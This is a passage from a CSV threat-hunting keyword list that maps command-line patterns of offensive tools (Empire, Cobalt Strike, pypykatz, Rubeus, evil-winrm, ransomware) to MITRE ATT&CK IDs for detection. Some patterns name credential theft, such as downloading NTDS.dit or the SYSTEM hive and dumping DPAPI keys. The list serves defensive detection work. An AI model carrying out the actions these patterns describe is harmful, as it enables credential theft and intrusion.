names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" +"* --domains ./domains.txt run*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"* domcon-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* domcon-cmd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"* domino-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -DoNotPersistImmediately *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --dont-enumerate-acls *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* --dont-enumerate-acls * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* --donut --rehash n --silent -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* donut.c *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* donut.exe *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* donut.o *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* --dotnetassembly * --amsi*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* --dotnetassembly * --appdomain *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* --dotnetassembly * --assemblyargs *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* --dotnetassembly * --mailslot*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* --dotnetassembly * --pipe *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* -Downgrade False -Restore False -Impersonate True * -challange *","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","0","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" +"* download *\NTDS\NTDS.dit*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"* download *\Windows\System32\config\SYSTEM*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"* dpap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dpapi blob *.json *.dat*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi credential *.json cred*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi masterkey /root/*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi minidump *.dmp*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi prekey nt *S-1-5-21*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi prekey password *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi prekey registry *.reg*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi securestring *.dat*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","0","N/A","N/A","1","55","28","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" +"* --drag-and-drop*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* DraytekScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* drda-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* drda-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* DriverName *Xeroxxx*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --drop-drag-and-drop-target*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dropping source port zero packet from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"* dump * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* dump --bucket *--dump-dir*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"* dump_memory64*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","0","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"* --dump-adcs*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* -DumpCerts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -DumpCreds *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"* --dump-gmsa*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained 